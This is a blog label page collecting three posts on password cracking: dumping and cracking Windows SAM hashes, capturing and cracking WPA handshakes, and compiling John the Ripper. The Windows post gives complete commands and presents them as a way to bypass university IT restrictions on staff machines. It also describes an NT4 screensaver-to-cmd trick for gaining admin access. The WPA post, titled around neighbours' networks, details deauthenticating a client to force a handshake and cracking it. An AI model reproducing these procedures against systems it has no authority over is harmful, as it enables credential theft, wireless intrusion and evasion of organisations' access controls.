Showing posts with label john the ripper. Show all posts
Showing posts with label john the ripper. Show all posts

28 March 2013

373. Cracking Windows passwords if you are a Linux user

Cracking windows passwords is no more difficult than any other set of passwords that need to be cracked via brute force/rainbow table lookup -- it's all about getting your hands on the right files to begin with.

Note that Vista and Windows 7 are the same in terms of how the passwords are stored. XP is different. You'll need to appropriate hash tables when cracking using Ophcrack-- you can't use XP hashes to crack Vista/7 and vice versa.

Why?
I actually have a fairly legit reason for this, other than pure curiosity: the professors and lecturers who have Win 7 at this Uni aren't given administrator access, so that they need to make an appointment with IT staff everytime they want to install or upgrade something. In my opinion, that's taking things way, way too far, especially in light of OSX user and Linux users don't face the same restrictions (I requested my computer to be delivered blank, so not even the IT staff can gain access without physically accessing my hdd).

I've also twice been in situations where a lab computer was set up by a PhD student who had since left, but without telling anyone the BIOS password in one case (remove CMOS battery, drain the power by shorting) and NT 4 password in another case (boot using linux, replace the screensaver file with cmd, boot, then wait and you've got admin access). Adding a few more techniques to your arsenal makes you a more well rounded human being. Plus you might gain a bit more respect from the students. Maybe.


Windows files that you need

You'll need to copy two files from your Windows harddrive (most likely o C:\). Since you can't access those files from within windows, the easiest way to do that is to make a bootable USB with linux on it, boot, then mount the windows partition and copy the files. It does require that you know how to mount devices from the command line in linux (hint: read up on mount) but it's really quite easy.

See here for how to make a linux usb install:
Arch: http://verahill.blogspot.com.au/2013/02/331-full-linux-install-on-usb-stick.html
Debian: http://verahill.blogspot.com.au/2013/03/361-installing-debian-on-usb-stick-from.html

On Windows Vista and Windows 7 you need to copy
/Windows/System32/config/SAM
/Windows/System32/config/SYSTEM.

On Windows XP you need to copy
/WINDOWS/system32/config/system
/WINDOWS/system32/config/SAM.


Generating input
First set up your linux system and install bkhive and samdump2. On Arch you can get these from the AUR (here and here), and on Debian you can install it from the repos by doing
sudo apt-get install bkhive samdump2

Once you have bkhive and samdump, do
bkhive system sys.out
samdump2 SAM sys.out > crack.list



Cracking
I prefer John the Ripper, but ophcrack is in the repos.

Ophcrack
Ophcrack is one alternative for which you can download rainbow tables, while John the Ripper can do it via password lists and brute force. You can get Ophcrack from the Debian repos as well as AUR in ARch.

To crack with Ophcrack you'll need tables -- you can get them from here: http://ophcrack.sourceforge.net/tables.php

Start with Xp Free Small or Vista Free, depending on whether you're going after XP or Vista/Windows 7 passwords. If your passwords still won't break, you can always get a bigger table. Put your tables in e.g. /tmp/crack/xp and /tmp/crack/vista

Do (for xp -- point towards /tmp/crack/vista for vista/windows 7)
ophcrack -n 6 -g -t /tmp/crack/xp -f crack.list

where -n 6 means to use 6 threads (use as many as you have cores). You can also launch ophcrack with a graphical user interface by simply typing ophcrack.

John the Ripper
On Arch you can get John the Ripper via the standard repos, and on Debian you can easily compile it.

You should get a good password list to guide your cracking -- rockyou is probably one of the best:
wget http://runamux.net/search/download/file/95wr2RdM/rockyoutxt.bz2
bunzip2 rockyoutxt.bz2

To crack XP passwords, run
john --wordlist=rockyoutxt --format=lm crack.list

To crack Vista or Windows 7 passwords, run
 john --wordlist=rockyoutxt --format=nt crack.list

If you have compiled john the ripper with mpi support, just launch it along the lines of
mpirun -n 6 john --wordlist=rockyoutxt --format=nt crack.list

There's no guarantee that you'll successfully crack all passwords -- it simply depends on 1) how common the passwords are or 2) whether they are short enough to brute force. I've used the methods above to crack passwords on a couple of machines (even virtual ones).

If you're really lazy and want a fully automated cracking experience, just use the ophcrack live cd. The downside is that you'll be occupying the machine which holds the windows installation until you're done cracking. With the method here you can crack at your leisure on your own windows machine.

30 October 2012

271. Your neighbours' WPA and you

So WEP is very easy to break, but WPA is much more of a challenge and breaking it involves a brute force attack.

The point of this post is to show that 1) you should select reasonably complex passwords (complex from a dictionary/autogeneration POV) and 2) no password is uncrackable, so changing your password on a regular basis is a good idea.

See http://verahill.blogspot.com.au/2012/10/your-neighbours-wep-wifi-and-you.html to get set up with aircrack and kismet.

For this post I used my office wifi and my android phone as the client.
 AP: "edunet2", Channel 6, MAC 00:1F:33:30:XX:XX,  Client: MAC 00:23:76:B0:XX:XX

Snooping
Kismet is a good tool for this. See here for how to get started with kismet: http://verahill.blogspot.com.au/2012/10/your-neighbours-wep-wifi-and-you.html

Or you could just use your android phone and a decent wireless scanner...


Attacking
First set up your interface and a work directory:
mkdir ~/airscan
cd ~/airscan
sudo airmon-ng start wlan1

Next, start to collect data:
sudo airodump-ng -c 6 --bssid 00:1F:33:30:XX:XX -w psk wlan1
CH 6 ][ Elapsed: 2 mins ][ 2012-10-29 11:43 ][ BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:1F:33:30:XX:XX -21 0 1536 711 0 6 54e. WPA TKIP PSK edunet2 BSSID STATION PWR Rate Lost Packets 00:1F:33:30:XX:XX 00:23:76:B0:XX:XX -18 54e-54e 0
You can now either wait, and wait and wait -- until you manage to capture a handshake (connection between client and AP).

 Or you can force things a bit if there's a client attached. To force it, de-authenticate the real client and hope that it's been set to auto-reconnect.
sudo aireplay-ng -0 1 -a 00:1F:33:30:XX:XX -c 00:23:76:B0:XX:XX wlan1
11:41:03 Waiting for beacon frame (BSSID: 00:1F:33:30:XX:XX) on channel 6 11:41:04 Sending 64 directed DeAuth. STMAC: [00:23:76:B0:XX:XX] [ 0|63 ACKs]
You're done when you see "WPA handshake: 00:1F:33:30:XX:XX" in the upper right corner.

Depending on how far away you are from the AP and the client this may or may not be easy.

Cracking the password exchanged during the handshake is the biggest challenge though.

Cracking for show
In the case you actually already know the password (e.g. you're cracking your own wireless), create a file called password.lst with your password in it. Or get a dictionary file and add your password to it.

Then run
aircrack-ng -w password.lst -b 00:1F:33:30:XX:XX psk*.cap

which gives
                                 Aircrack-ng 1.1 r1901


                   [00:00:00] 1 keys tested (389.52 k/s)


                      KEY FOUND! [ supersecretpassword ]


      Master Key     : 49 97 0F F9 BE 9E BB DB 9B 92 70 E2 2A 31 D5 1D 
                       29 31 24 17 83 E9 45 63 D3 B0 E1 AE FA 65 DF 7B 

      Transient Key  : 37 6A 8D BC D6 2F 13 BD 31 DA B8 F4 21 A7 65 5C 
                       A9 39 9A 6B 68 44 D6 12 17 D2 E2 A5 6E 9E 51 19 
                       4D A7 F7 5E 96 EB 41 06 D5 55 8A 53 23 04 66 D1 
                       86 AC CC A1 13 17 CC 1A BF 62 9E 9B 20 6C DC 10 

      EAPOL HMAC     : B3 07 9D 1A 16 A4 E0 EB C2 EE 71 81 D5 CB 56 E8 

As far as I understand aircrack-ng only support dictionary based attacks for WPA.


Brute-force using John the Ripper (sort of):
Ideally I should use the method shown below this section, but I haven't quite gotten that to work.

Instead I use john to generate the random strings and pipe them to aircrack-ng:

/opt/john/john-1.7.9/run/./john  --incremental=Alpha --stdout| aircrack-ng -b 00:1F:33:30:XX:XX -w - psk*.cap

And that kind of works, although awkwardly so -- you can look at john.conf for limits to how the random passwords are generated (i.e. MaxLen, MinLen)

What should've worked follows below -- but it doesn't work for me.


So far not working:
*In theory everything below works, but I'm having no luck cracking the password even if I put it in the dictionary -- which is the points of the whole exercise.

Brute-forcing using John the Ripper:
This requires more brawn than brain, so using e.g. John the Ripper may be a good idea. See here for a suitable set-up for a beowulf cluster: http://verahill.blogspot.com.au/2012/09/compiling-john-ripper-singleserial.html

The only issue is that John the Ripper doesn't handle cap files directly.

Compile and install cap2hccap:
mkdir ~/tmp/cap2hccap
cd ~/tmp/cap2hccap
wget http://sourceforge.net/projects/cap2hccap/files/cap2hccap.tar.gz
tar xvf cap2hccap.tar.gz
make

That creates a binary called cap2hccap.bin.

You might get a few warnings, but that's nothing to worry about. You might want to move the binary to e.g. /usr/local/bin
sudo mv cap2hccap.bin /usr/local/bin/

Convert your cap file from before
cap2hccap.bin psk-02.cap psk-02.hccap
[info ] writing handshake for "edunet2".
Convert that file in turn:
/opt/john/john-1.7.9-jumbo-6/run/hccap2john psk-02.hccap > psk-02.john

And crack
touch john.ini
john --wordlist=password.lst --format=wpapskda psk-02.john

I'm just generally having very little luck with john the ripper to be honest, regardless of what I'm trying to crack -- so far I've only managed to test the password strengths of users on one of my linux boxes.


Errors:
If you get
./hccap2john psk-02.hccap psk-02.john
hccap2john: hccap2john.c:75: process_file: Assertion `bytes==392' failed. Aborted
you should upgrade to version 1.7.9-jumbo-7 or better.
 Bug reported here: https://bugs.archlinux.org/task/30516 and here: http://www.openwall.com/lists/john-dev/2012/07/07/3

If you get
john --wordlist=/opt/john/wordlist.lst --format=wpapsk psk-02.john
fopen: $JOHN/john.ini: No such file or directory
just create a file called john.ini in your working directory
touch john.ini

11 September 2012

231. Compiling john the ripper: single/serial, parallel/OMP and MPI

Update: updated for v1.7.9-jumbo-7 since hccap2john in 1.7.9-jumbo-6 was broken

For no particular reason at all, here's how to compile John the Ripper on Debian Testing (Wheezy). It's very easy, and this post is probably a bit superfluous. The standard version only supports serial and parallel (OMP). See below for MPI.


The regular version: 

mkdir ~/tmp
cd ~/tmp
wget http://www.openwall.com/john/g/john-1.7.9.tar.gz
tar xvf john-1.7.9.tar.gz
cd john-1.7.9/src

If you don't edit the Makefile you build a serial/single-threaded binary.
If you want to build a threaded version for a single node with a multicore processor (OMP) do:
Edit Makefile and uncomment row 19 or 20

 18 # gcc with OpenMP
 19 OMPFLAGS = -fopenmp
 20 OMPFLAGS = -fopenmp -msse2
make clean linux-x86-64
cd ../run

You now have a binary called john in your ../run folder.


The Jumbo version:
If you want to build a distributed version with MPI (can split jobs across several nodes) you need the enhanced, community version:

sudo apt-get install openmpi-bin libopenmpi-dev
cd ~/tmp
wget http://www.openwall.com/john/g/john-1.7.9-jumbo-7.tar.gz
tar xvf john-1.7.9-jumbo-7.tar.gz 
cd john-1.7.9-jumbo-7/src

Edit the Makefile
  20 ## Uncomment the TWO lines below for MPI (can be used together with OMP as well)
  21 ## For experimental MPI_Barrier support, add -DJOHN_MPI_BARRIER too.
  22 ## For experimental MPI_Abort support, add -DJOHN_MPI_ABORT too.
  23 CC = mpicc -DHAVE_MPI
  24 MPIOBJ = john-mpi.o

and do
make clean linux-x86-64-native
cd ../run

I had a look at the passwords on one of our lab boxes -- it immediately discovered that someone had used 'password' as the password...


These test were run on my old AMD II X3 445. Processes which don't speed up with MP are highlighted in red. LM DES is borderline -- it's faster, but doesn't scale well.

Here's the single thread/serial version:
./john --test
Benchmarking: Traditional DES [128/128 BS SSE2-16]... DONE
Many salts:     2906K c/s real, 2918K c/s virtual
Only one salt:  2796K c/s real, 2807K c/s virtual
Benchmarking: BSDI DES (x725) [128/128 BS SSE2-16]... DONE
Many salts:     95564 c/s real, 95948 c/s virtual
Only one salt:  93593 c/s real, 93781 c/s virtual
Benchmarking: FreeBSD MD5 [32/64 X2]... DONE
Raw:    14094 c/s real, 14122 c/s virtual
Benchmarking: OpenBSD Blowfish (x32) [32/64 X2]... DONE
Raw:    918 c/s real, 919 c/s virtual
Benchmarking: Kerberos AFS DES [48/64 4K]... DONE
Short:  474316 c/s real, 475267 c/s virtual
Long:   1350K c/s real, 1356K c/s virtual
Benchmarking: LM DES [128/128 BS SSE2-16]... DONE
Raw:    39843K c/s real, 39923K c/s virtual
Benchmarking: generic crypt(3) [?/64]... DONE
Many salts:     262867 c/s real, 263393 c/s virtual
Only one salt:  260121 c/s real, 260642 c/s virtual
Benchmarking: Tripcode DES [48/64 4K]... DONE
Raw:    369843 c/s real, 370584 c/s virtual
Benchmarking: dummy [N/A]... DONE
Raw:    99512K c/s real, 99712K c/s virtual
Here's the OMP version:
Benchmarking: Traditional DES [128/128 BS SSE2-16]... DONE
Many salts:     6706K c/s real, 2555K c/s virtual
Only one salt:  5015K c/s real, 2091K c/s virtual
Benchmarking: BSDI DES (x725) [128/128 BS SSE2-16]... DONE
Many salts:     205670 c/s real, 85411 c/s virtual
Only one salt:  238524 c/s real, 86720 c/s virtual
Benchmarking: FreeBSD MD5 [32/64 X2]... DONE
Raw:    38400 c/s real, 13812 c/s virtual
Benchmarking: OpenBSD Blowfish (x32) [32/64 X2]... DONE
Raw:    2306 c/s real, 845 c/s virtual
Benchmarking: Kerberos AFS DES [48/64 4K]... DONE
Short:  474675 c/s real, 476581 c/s virtual
Long:   1332K c/s real, 1335K c/s virtual
Benchmarking: LM DES [128/128 BS SSE2-16]... DONE
Raw:    49046K c/s real, 16785K c/s virtual
Benchmarking: generic crypt(3) [?/64]... DONE
Many salts:     721670 c/s real, 246640 c/s virtual
Only one salt:  699168 c/s real, 239605 c/s virtual
Benchmarking: Tripcode DES [48/64 4K]... DONE
Raw:    367444 c/s real, 369657 c/s virtual
Benchmarking: dummy [N/A]... DONE
Raw:    100351K c/s real, 100552K c/s virtual
And here's the MPI version:
mpirun -n 3 ./john --test
(note that this includes a great many more tests than the default version)
Benchmarking: Traditional DES [128/128 BS SSE2-16]... (3xMPI) DONE
Many salts:     8533K c/s real, 8707K c/s virtual
Only one salt:  7705K c/s real, 8110K c/s virtual
Benchmarking: BSDI DES (x725) [128/128 BS SSE2-16]... (3xMPI) DONE
Many salts:     279808 c/s real, 282634 c/s virtual
Only one salt:  273362 c/s real, 276096 c/s virtual
Benchmarking: FreeBSD MD5 [128/128 SSE2 intrinsics 12x]... (3xMPI) DONE
Raw:    65124 c/s real, 65781 c/s virtual
Benchmarking: OpenBSD Blowfish (x32) [32/64 X2]... (3xMPI) DONE
Raw:    2722 c/s real, 2749 c/s virtual
Benchmarking: Kerberos AFS DES [48/64 4K]... (3xMPI) DONE
Short:  1387K c/s real, 1415K c/s virtual
Long:   3880K c/s real, 3959K c/s virtual

Benchmarking: LM DES [128/128 BS SSE2-16]... (3xMPI) DONERaw:    114781K c/s real, 115940K c/s virtual

I don't quite understand the Kerberos results.



Other targets of interest are:

linux-x86-64-avx         Linux, x86-64 with AVX (2011+ Intel CPUs)
linux-x86-64-xop         Linux, x86-64 with AVX and XOP (2011+ AMD CPUs)
linux-x86-64             Linux, x86-64 with SSE2 (most common)
linux-x86-avx            Linux, x86 32-bit with AVX (2011+ Intel CPUs)
linux-x86-xop            Linux, x86 32-bit with AVX and XOP (2011+ AMD CPUs)
linux-x86-sse2           Linux, x86 32-bit with SSE2 (most common, if 32-bit)
linux-x86-mmx            Linux, x86 32-bit with MMX (for old computers)
linux-x86-any            Linux, x86 32-bit (for truly ancient computers)

The FX 8150 does AVX and XOP, while my 1055T doesn't.

The community version has more options:

linux-x86-64-native      Linux, x86-64 'native' (all CPU features you've got)
linux-x86-64-gpu         Linux, x86-64 'native', CUDA and OpenCL (experimental)
linux-x86-64-opencl      Linux, x86-64 'native', OpenCL (experimental)
linux-x86-64-cuda        Linux, x86-64 'native', CUDA (experimental)
linux-x86-64-avx         Linux, x86-64 with AVX (2011+ Intel CPUs)
linux-x86-64-xop         Linux, x86-64 with AVX and XOP (2011+ AMD CPUs)
linux-x86-64[i]          Linux, x86-64 with SSE2 (most common)
linux-x86-64-icc         Linux, x86-64 compiled with icc
linux-x86-64-clang       Linux, x86-64 compiled with clang
linux-x86-gpu            Linux, x86 32-bit with SSE2, CUDA and OpenCL (experimental)
linux-x86-opencl         Linux, x86 32-bit with SSE2 and OpenCL (experimental)
linux-x86-cuda           Linux, x86 32-bit with SSE2 and CUDA (experimental)
linux-x86-sse2[i]        Linux, x86 32-bit with SSE2 (most common, 32-bit)
linux-x86-native         Linux, x86 32-bit, with all CPU features you've got (not necessarily best)
linux-x86-mmx            Linux, x86 32-bit with MMX (for old computers)
linux-x86-any            Linux, x86 32-bit (for truly ancient computers)
linux-x86-clang          Linux, x86 32-bit with SSE2, compiled with clang
linux-alpha              Linux, Alpha
linux-sparc              Linux, SPARC 32-bit
linux-ppc32-altivec      Linux, PowerPC w/AltiVec (best)
linux-ppc32              Linux, PowerPC 32-bit
linux-ppc64              Linux, PowerPC 64-bit
linux-ia64               Linux, IA-64